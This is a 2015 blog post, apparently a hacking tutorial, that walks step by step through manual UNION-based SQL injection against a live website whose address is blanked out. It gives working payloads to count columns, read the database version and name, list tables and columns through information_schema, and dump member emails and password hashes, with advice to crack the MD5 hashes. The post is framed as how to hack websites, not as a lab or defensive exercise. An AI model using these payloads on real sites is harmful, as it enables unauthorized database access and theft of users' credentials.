Thursday, 19 February 2015

How to hack websites using Manual SQL injection

Hello Friends, Today we are going to learn how to hack a website using Manual SQL injection.
The website which we will be using in this demo is :

So, here is the Vulnerable link :'100

So lets begin :

Step 1: First we have to find the number of columns present in the database. So to do that we have to implement the "order by" command in the vulnerable site. Example: order by 7 (any no. u have to guess it, i m using 13 )

*Remember if u get error in "order by 7" that means site has less than 7 columns,if we get the same page then the no. of columns is more than 7.. In my case the number of columns are 13.

Step 2 : After getting the columns, its time to get the vulnerable column by using "UNION SELECT" no. of all columns 1 after another separated by commas(,). See the example for more clarification :

Example :,2,3,4,5,6,7,8,9,10,11,12,13--

Step 3 : In my case I got 4 and 7 as vulnerable column.(We will try with column 4). We can inject our queries in column 4 for version we can add @@version, for db database() UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12,13-- (for getting the version) UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13-- (for getting the database)

Step 4 :  Now we hav got the version as well as database name, now its time to search for the table. For that we will replace the 4 with group_concat(table_name) and add from information_schema.tables where table_schema=database(). Example : UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--

Step 5: Now it's time for getting the columns from the User tables,we need the mysql char for this. we will replace the table_name with column_name and from information_schema.tables where table_name=mysqlchar. Just search for user and pass. Example : UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(109, 101, 109, 98, 101, 114, 115, 104, 105, 112)--

Step 6 : Final step to get the username and password from the column email and pass. we will remove everything from the information_schema and will add the (user,0x3a,newpass) from user's tables. Example. Just replace email and phone with ur admin and password. U will get the password in MD5 has just decrypt it. UNION SELECT 1,2,3,group_concat(email,0x3a,phone),5,6,7,8,9,10,11,12,13 from membership--

# Any problem in understanding or execution do comment below.

No comments:

Post a Comment

Hyperlinks are not allowed in comments, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!

Thanks for visiting our website,Bookmark us for more updates.

Contact us


Email *

Message *